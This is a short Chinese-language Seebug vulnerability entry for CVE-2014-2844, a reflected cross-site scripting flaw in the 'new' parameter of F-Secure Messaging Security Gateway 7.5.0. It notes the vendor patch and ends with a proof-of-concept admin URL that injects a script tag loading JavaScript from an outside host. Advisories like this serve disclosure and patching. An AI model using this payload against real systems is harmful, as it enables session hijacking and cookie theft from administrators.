F-Secure Messaging Security Gateway 'new'参数跨站脚本漏洞

2014-04-21T00:00:00
ID SSV:62229
Type seebug
Reporter Root
Modified 2014-04-21T00:00:00

Description

Bugtraq ID:66959 CVE ID:CVE-2014-2844

F-Secure Messaging Security Gateway是一款消息安全网关解决方案。

F-Secure Messaging Security Gateway存在一个反射型跨站脚本漏洞,允许攻击者构建恶意URI,诱使用户解析,可获得敏感Cookie,劫持会话或在客户端上进行恶意操作。 0 F-Secure Messaging Security Gateway 7.5.0 F-Secure Messaging Security Gateway 7.5.0 Patch 1862版本已修复该漏洞,建议用户下载使用: http://www.f-secure.com/en/web/labs_global/fsc-2014-2

                                        
                                            
                                                https://IP_FSecure:10000/admin?module=SysUser&method=user&new=1><script
src=//10.0.1.120/f-secure/e.js